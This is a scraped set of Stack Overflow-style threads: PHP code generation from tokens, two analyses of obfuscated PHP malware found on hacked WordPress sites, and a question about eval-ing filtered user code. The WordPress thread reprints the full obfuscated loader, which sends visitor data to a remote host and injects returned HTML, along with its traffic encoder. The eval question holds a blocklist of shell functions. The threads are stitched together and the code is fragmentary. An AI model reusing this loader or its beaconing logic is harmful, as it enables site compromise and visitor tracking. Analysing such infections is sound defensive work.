Generating PHP code (from Parser Tokens) - php

Is there any available solution for (re-)generating PHP code from the Parser Tokens returned by token_get_all? Other solutions for generating PHP code are welcome as well, preferably with the associated lexer/parser (if any).

From my comment:
Does anyone see a potential problem,
if I simply write a large switch
statement to convert tokens back to
their string representations (i.e.
T_DO to 'do'), map that over the
tokens, join with spaces, and look for
some sort of PHP code pretty-printing
After some looking, I found a PHP homemade solution in this question, that actually uses the PHP Tokenizer interface, as well as some PHP code formatting tools which are more configurable (but would require the solution as described above).
These could be used to quickly realize a solution. I'll post back here when I find some time to cook this up.
Solution with PHP_Beautifier
This is the quick solution I cooked up, I'll leave it here as part of the question. Note that it requires you to break open the PHP_Beautifier class, by changing everything (probably not everything, but this is easier) that is private to protected, to allow you to actually use the internal workings of PHP_Beautifier (otherwise it was impossible to reuse the functionality of PHP_Beautifier without reimplementing half their code).
An example usage of the class would be:
file: main.php
// read some PHP code (the file itself will do)
$phpCode = file_get_contents(__FILE__);
// create a new instance of PHP2PHP
$php2php = new PHP2PHP();
// tokenize the code (forwards to token_get_all)
$phpCode = $php2php->php2token($phpCode);
// print the tokens, in some way
echo join(' ', array_map(function($token) {
return (is_array($token))
? ($token[0] === T_WHITESPACE)
? ($token[1] === "\n")
? "\n"
: ''
: token_name($token[0])
: $token;
}, $phpCode));
// transform the tokens back into legible PHP code
$phpCode = $php2php->token2php($phpCode);
As PHP2PHP extends PHP_Beautifier, it allows for the same fine-tuning under the same API that PHP_Beautifier uses. The class itself is:
file: PHP2PHP.php
class PHP2PHP extends PHP_Beautifier {
function php2token($phpCode) {
return token_get_all($phpCode);
function token2php(array $phpToken) {
// prepare properties
$this->aTokens = $phpToken;
$iTotal = count($this->aTokens);
$iPrevAssoc = false;
// send a signal to the filter, announcing the init of the processing of a file
foreach($this->aFilters as $oFilter)
for ($this->iCount = 0;
$this->iCount < $iTotal;
$this->iCount++) {
$aCurrentToken = $this->aTokens[$this->iCount];
if (is_string($aCurrentToken))
$aCurrentToken = array(
0 => $aCurrentToken,
1 => $aCurrentToken
// ArrayNested->off();
$sTextLog = PHP_Beautifier_Common::wsToString($aCurrentToken[1]);
// ArrayNested->on();
$sTokenName = (is_numeric($aCurrentToken[0])) ? token_name($aCurrentToken[0]) : '';
$this->oLog->log("Token:" . $sTokenName . "[" . $sTextLog . "]", PEAR_LOG_DEBUG);
$iFirstOut = count($this->aOut); //5
$bError = false;
$this->aCurrentToken = $aCurrentToken;
if ($this->bBeautify) {
foreach($this->aFilters as $oFilter) {
$bError = true;
if ($oFilter->handleToken($this->aCurrentToken) !== FALSE) {
$this->oLog->log('Filter:' . $oFilter->getName() , PEAR_LOG_DEBUG);
$bError = false;
} else {
$iLastOut = count($this->aOut);
// set the assoc
if (($iLastOut-$iFirstOut) > 0) {
$this->aAssocs[$this->iCount] = array(
'offset' => $iFirstOut
if ($iPrevAssoc !== FALSE)
$this->aAssocs[$iPrevAssoc]['length'] = $iFirstOut-$this->aAssocs[$iPrevAssoc]['offset'];
$iPrevAssoc = $this->iCount;
if ($bError)
throw new Exception("Can'process token: " . var_dump($aCurrentToken));
} // ~for
// generate the last assoc
if (count($this->aOut) == 0)
throw new Exception("Nothing on output!");
$this->aAssocs[$iPrevAssoc]['length'] = (count($this->aOut) -1) - $this->aAssocs[$iPrevAssoc]['offset'];
// post-processing
foreach($this->aFilters as $oFilter)
return $this->get();

In the category of "other solutions", you could try PHP Parser.
The parser turns PHP source code into an abstract syntax tree....Additionally, you can convert a syntax tree back to PHP code.

If I'm not mistaken uses token_get_all() and then rewrites the stream. It uses heaps of methods like t_else and t_close_brace to output each token. Maybe you can hijack this for simplicity.

See our PHP Front End. It is a full PHP parser, automatically building ASTs, and a matching prettyprinter that regenerates compilable PHP code complete with the original commments. (EDIT 12/2011:
See this SO answer for more details on what it takes to prettyprint from ASTs, which are just an organized version of the tokens:
The front end is built on top of our DMS Software Reengineering Toolkit, enabling the analysis and transformation of PHP ASTs (and then via the prettyprinter code).


Malicious code found in WordPress theme files. What does it do?

I discovered this code inserted at the top of every single PHP file inside of an old, outdated WordPress installation. I want to figure out what this script was doing, but have been unable to decipher the main hidden code. Can someone with experience in these matters decrypt it?
<?php if (!isset($GLOBALS["anuna"])) {
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11"))) $GLOBALS["anuna"] = 1;
} ?>
<?php $nzujvbbqez = 'E{h%x5c%x7825)j{hnpd!opjudovg-%x5c%x7824]26%x5c%x7824-%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<x5c%x782f#)rrd%x5c%x83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y<X>b%x5c%x7825Z<#opo#>b{jt)!gj!<*2bd%x5c%x7euhA)3of>2bd%x5c%x7825!<5h%x5c%x78225%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tus66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5cc%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878284]364]6]234]342]58]24]311]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#73]y72]282#<!%x5c%x7825tjw!>!x5c%x7825%x5c%x787f!25ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpd8;0]=])0#)U!%x5c%x7827{**u%x5c%x7%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x7.3%x5c%x7860hA%x5c%x7827pd%x5c%x782525)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x55%x5c%x782f#0#%x5c%x782f*#npd%}#-#%x5c%x7824-%x5c%x7824-tusvd},;uqpuft%x5c%x7860>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyf5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5tcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x25%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x786<.fmjgA%x5c%x7827doj%x825-#jt0}Z;0]=]0#)2q%x5c%xx5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x78%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78ec%x7825!**X)ufttj%x5c%x7822)r.985:52985-t.98]K4]65]D8]86]y37827pd%x5c%x78256<pd%x5c%x7825w6Z6<]5]48]32M3]317]445]212]445]43]321]464]n)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x782so!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5cW~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2%x5c%x78b%x5c%x7825w:!>!%x5c27;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%xufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:5cq%x5c%x78257**^#zsfvr#27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSc%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%xc%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id1%x29%73", NULL); }IjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuv5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7ec%x787f%x5c%x787f%x5c%x787f%x5%x5c%x7825)ftpmdR6<*id%x5c%x78mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#7825l}S;2-u%x5c%x7825!-#2#%**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<]y74]256]y39]252]y83]2761"])))) { $GLOBALS["%x61%156%x75%156%x61"]=1; funx5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)%x7825zB%x5c%x7825z>!tussfw)%x5c%xu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c165%x3a%146%x21%76%x21%50%x5cction fjfgg($n){return 78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x76]277]y72]265]y39]271]y83]256]y78]248]y827!hmg%x5c%x7825!)!gj!<2,*qpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824doF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x561%154%x28%151%x6d%160%x6c%157%x6%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x785j:.2^,%x5c%x7825b:<!%x5c%x<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x78*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x78787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x57###7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x7x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5ce:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x782x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%k;opjudovg}%x5c%x7877825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x77825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j25!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf%x5c%x7825!*##>>X)!gjZ<#opo#>b%x533]65]y31]53]y6d]281]y43825<#762]67y]562]38y]572]48y]j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubx7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboep5h>#]y31]278]y3e]81]K78:56985:6197g:74787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822o]#%x5c%x782f*)323zbe!-#jt0*?]+^782f#00;quui#>.%x5c%x7825!<***f%x5c%x7946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQc%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{25)Rb%x5c%x7825))!gj!<*#cd1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%xj!|!*msv%x5c%x7825)}k~~~<ftm4-%x5c%x7824y7%x5c%x7824-%x5ce%x5c%x7825!osvufs!*!+A!>!{e%x5x7825)uqpuft%x5c%x7860msc%x7825>U<#16,47R57,27R]K5]53]Kc#<%x5c%x7825tp&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!x7825!<**3-j%x5c%x78%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]3x5c%x782f#%x5c%x7825#%x5c%x782f#mqnj!%x5c%x782f!#0#)idubn%x5c#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c#-%x5c%x7825tdz*Wsfuvso!%x5c%78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273fttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%xf!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;60%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%xc%x787f<u%x5c%x7825Vif((function_exists("%x6f%142%x5f%163%x74%141%x7%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%xz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4x5c%x78257>%x5c%x782f7&6|7**11x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5 c%x7825c5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825)dfyfR%x5c%x7827tfs%x54%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*#)tutjyf%x5c%x7860opjudovg)!gE#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]%x5c%x785cq%x5c%x7825)uoe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x!>!tus%x5c%x7860sfqmbdf)%x5c%4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x6<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]yq%x5c%x7825V<*#fopoV;hojepmsvd}+;!>!}%x5c%x7827;!4%145%x28%141%x72%162%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x78827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%xov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x77825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x78]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqchr(ord($n)-1);} #erro%x7824*<!%x5c%x7824-2bge56+99386c6f+9f5d816:+25)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x782mpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3825!*72!%x5c%x7827!hmg%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x782[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-d]51]y35]256]y76]72]y3d]51]y35]274]yeobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!*#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x78]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<bg!osvufs!|ftmf!~<**9.-j%x5c5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7dx7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5**b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x7sfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x7825bss%x5c%x785csbhpph#)zbssb!-#}#)fep:~:<*9-1-r%x5c%x7825)825,3,j%x5c%x7825>j%x5c%82f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmc%x78786<C%x5c%x7827&6<*rfs%x5c1127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5%x7825-bubE{h%x5c%x7825)su34]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88825-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)25-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%xx7827)fepdof.)fepdof.%x5c%x782f###%V,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%xr_reporting(0); preg_replace("%x2f%50%x2e%52%x29%57%x65","%x65%166%xy76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osv2%164") && (!isset($GLOBALS["%x61%156%x75%156%xu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%8257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]5j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%5c%x7825)fnbozcYufhA%x5c%x78272qj%x/(.*)/epreg_replacestvbowvmjj';
$uskbxljsbs = explode(chr((169 - 125)), '6393,48,9851,47,2858,50,3117,23,8291,22,9595,68,3457,33,7412,23,3914,63,6775,52,3088,29,1791,56,2150,28,6441,66,3140,43,1906,35,926,36,7276,35,2578,51,2993,59,275,45,6613,30,9241,42,9210,31,886,40,9989,41,5417,69,4931,62,1312,54,534,47,483,51,7223,53,10071,35,6190,50,3811,39,6142,48,2353,24,7062,23,6048,57,1266,46,3977,58,8168,55,1633,23,5272,63,2455,47,2659,30,6751,24,6827,38,2377,38,9554,41,3706,63,5644,70,4249,67,5105,50,4787,40,5574,24,1087,21,7389,23,1108,60,6277,47,6865,29,5486,28,8828,28,9283,26,1366,61,3223,27,6949,50,8506,23,3850,64,1739,52,9128,24,5714,20,9449,70,7435,62,8131,37,4653,70,0,29,4316,56,3572,68,4528,39,180,20,9379,70,200,35,1028,30,92,20,5025,38,7567,50,9519,35,2908,51,8672,58,8986,47,9152,58,9087,20,5879,29,3769,42,8029,45,5391,26,8333,25,5063,42,5203,69,9718,65,726,20,157,23,4567,33,1847,28,1212,54,9898,51,3640,66,6324,49,5155,48,61,31,9783,68,2271,36,815,38,7717,69,2793,42,5335,56,5543,31,3399,58,2629,30,6373,20,4372,65,8925,61,5598,23,362,57,7363,26,3353,46,3052,36,1581,52,2178,48,4180,20,853,33,1656,26,2766,27,5847,32,4993,32,1168,44,9663,55,2835,23,698,28,5908,51,6999,63,1530,51,419,64,9107,21,7617,37,7497,70,962,66,2415,40,4437,51,7786,70,4624,29,8730,39,8358,50,5988,60,8074,57,6105,37,4723,64,1682,57,1489,41,1058,29,3250,41,7155,29,3291,62,29,32,8408,59,5514,29,8313,20,3490,55,235,40,8223,68,8467,39,8636,36,7184,39,320,42,9033,34,6643,67,2521,57,2026,60,2959,34,7856,64,6240,37,4200,49,4827,66,1979,47,4893,38,581,48,1875,31,655,43,4035,53,5621,23,6507,46,6553,60,8769,59,7654,63,7920,49,8593,43,5734,68,5802,45,9309,70,1941,38,629,26,5959,29,9067,20,7085,70,9949,40,4088,56,10030,41,4144,36,8529,64,3545,27,4488,40,2307,46,2086,64,1427,62,6710,41,746,69,2689,20,2709,57,6894,55,2226,45,8856,26,8882,43,7311,52,3183,40,112,45,4600,24,7969,60,2502,19');
$aemhtmvyge = substr($nzujvbbqez, (69491 - 59385), (44 - 37));
if (!function_exists('hperlerwfe')) {
function hperlerwfe($opchjywcur, $oguxphvfkm) {
$frnepusuoj = NULL;
for ($yjjpfgynkv = 0;$yjjpfgynkv < (sizeof($opchjywcur) / 2);$yjjpfgynkv++) {
$frnepusuoj.= substr($oguxphvfkm, $opchjywcur[($yjjpfgynkv * 2) ], $opchjywcur[($yjjpfgynkv * 2) + 1]);
return $frnepusuoj;
$rfmxgmmowh = " /* orpuzttrsp */ eval(str_replace(chr((230-193)), chr((534-442)), hperlerwfe($uskbxljsbs,$nzujvbbqez))); /* unvtjodgmt */ ";
$yiffimogfj = substr($nzujvbbqez, (60342 - 50229), (38 - 26));
$yiffimogfj($aemhtmvyge, $rfmxgmmowh, NULL);
$yiffimogfj = $rfmxgmmowh;
$yiffimogfj = (470 - 349);
$nzujvbbqez = $yiffimogfj - 1; ?>
After digging though the obfuscated code untangling a number of preg_replace, eval, create_function statements, this is my try on explaining what the code does:
The code will start output buffering and register a callback function triggered at the end of buffering, e.g. when the output is to be sent to the web server.
First, the callback function will attempt to uncompress the output buffer contents if necessary using gzinflate, gzuncompress, gzdecode or a custom gzinflate based decoder (I have not dug any deeper into this).
With the contents uncompressed, a request will be made containing the $_SERVER values of
... to the domain given by chars 0-8 or 8-15 (randomly picks one or the other) in an md5 hash of the IPv4 address of "" appended with ".com", currently giving md5(".com" . <IPv4> ) => md5(".com8.8.8.8") => "" / "".
The request will be attempted using file_get_contents, curl_exec, file and finally socket_write.
Note that no request will be made if:
any of the HTTP_USER_AGENT, REMOTE_ADDR or HTTP_HOST is empty/not set
PHP_SELF contains the word "admin"
HTTP_USER_AGENT contains any of the words "google", "slurp", "msnbot", "ia_archiver", "yandex" or "rambler".
Secondly, if the output buffer contents has a body or html tag, and the response from the request above (decoded using en2() function below) contains at least one "!NF0" string, the content between the first and second "!NF0" (or end of string) will be injected into the HTML page at the beginning of the body or in case there is no body tag, the html tag.
The code used for encoding/decoding traffic is this one:
function en2($s, $q) {
$g = "";
while (strlen($g) < strlen($s)) {
$q = pack("H*", md5($g . $q . "q1w2e3r4"));
$g .= substr($q, 0, 8);
return $s ^ $g;
$s is the string to encode/decode and $q is a random number between 100000 and 999999 acting as a key.
The request URL mentioned above is calculated like this:
$url = "http:// ... /"
. $op // Random number/key
. "?"
. urlencode(
base64_encode(en2( $http_user_agent, $op)) . "." .
base64_encode(en2( $http_referrer, $op)) . "." .
base64_encode(en2( $remote_addr, $op)) . "." .
base64_encode(en2( $http_host, $op)) . "." .
base64_encode(en2( $php_self, $op))
While I have not found any sign of what initially placed the malicious code on your server, or that it does anything else than allowing for bad HTML/JavaScript code to be injected on your web pages that does not mean that it is not still there.
You really should make a clean install, like suggested by #Bulk above:
The only way you'll ever know for sure it's been cleaned is to
re-install absolutely everything you can from scratch - i.e. fresh
wordpress install, fresh plugin install. Then literally comb every
line of your theme for anything out of the ordinary. Also of note,
they often will put things in wp-content/uploads that look like images
but aren't - check those too.
Pastebin here.

How can this user code input procedure be exploited?

I'm trying to come up with a way that a user can input code fragments that will be able to run both server-side and client-side. In an ideal world, I'd have a LUA interpreter or a Javascript engine on the server which I could call out to, but I don't see either of those as an easy solution (to set up on my dev machine OR find a host that will do it).
I've got an idea of allowing the user to write a code snippet to run in Javascript, then translate it to be used in PHP.
The usage is for the user to write the internals of a function call which does various things. A (very) simple example would be to give the user a function that takes the parameter 'amount', and they could write a string like amount * 1.05 (which then translates to function(amount) { return amount * 1.05; } in Javascript, or function($amount) { return $amount * 1.05; } in PHP. A more complicated example would be (speed < 9) ? Math.pow(speed, (10 / 3)) : Math.pow(speed, (10 / 3) + (-0.5 * Math.log(10 - speed) / Math.log(10))). For protection in the PHP side, only recognized variable names (the function parameters, such as amount or speed in the two prior examples) have a $ placed on them, and certain known Javascript library calls or functions like Math are/will be translated (in the case of Math, all of the Javascript functions are directly compatible with PHP, so we just strip "Math."). The PHP code would then be run through something like $func = eval(Pseudocode::generatePhpCode($code)); to get the server-side function.
My question is - despite my attempts to LIMIT what can be run, could this be exploited somehow? What improvements can I make?
static function generatePhpCode($pseudocode, $parameterList)
// Make a list of things that are not allowed in the "pseudocode"
$illegal = ['$', '#', '->', '::', '`', 'exec', 'eval', 'system', 'passthru', 'popen', 'pclose', 'fopen', 'fclose', 'proc_', 'select', 'shell', 'sql', 'ini', 'echo'];
foreach ($illegal as $string) {
if (strpos($pseudocode, $string) !== false) {
throw new InvalidCallException('Attempted to pass illegal pseudocode function.');
$paramList = '';
foreach ($parameterList as $param) {
$pseudocode = str_replace(['Math.', $param], ['', '$' . $param], $pseudocode);
$paramList .= ',$' . $param;
'function (' . ltrim($paramList, ',') . ') {' . PHP_EOL .
' return ' . $pseudocode . ';' . PHP_EOL .

Hacked site - encrypted code

Couple days ago I gave noticed that almost all php files on my server are infected with some encrypted code and in almost every file is different. Here is the example from one of the files:
Can anybody tell me what this code do or how to decode it?
You can calculate the values of some of the variables, and begin to get your bearings.
$vmksmhmfuh = 'preg_replace'; //substr($qbrqftrrvx, (44195 - 34082), (45 - 33));
preg_replace('/(.*)/e', $viwdamxcpm, null); // Calls the function wgcdoznijh() $vmksmhmfuh($ywsictklpo, $viwdamxcpm, NULL);
So the initial purpose is to call the wgcdonznijh() function with the payloads in the script, this is done by way of an embedded function call in the pre_replace subject the /e in the expression.
/* aviewwjaxj */ eval(str_replace(chr((257-220)), chr((483-391)), wgcdoznijh($tbjmmtszkv,$qbrqftrrvx))); /* ptnsmypopp */
If you hex decode the result of that you will be just about here:
if ((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) {
$GLOBALS["anuna"] = 1;
function fjfgg($n)
return chr(ord($n) - 1);
preg_replace("/(.*)/e", "eval(implode(array_map("fjfgg",str_split("\x25u:f!>!(\x25\x78:!> ...
The above is truncated, but you have another payload as the subject of the new preg_replace function. Again due to e it has the potential to execute.
and it is using the callback on array_map to further decode the payload which passed to the eval.
The pay load for eval looks like this (hex decoded):
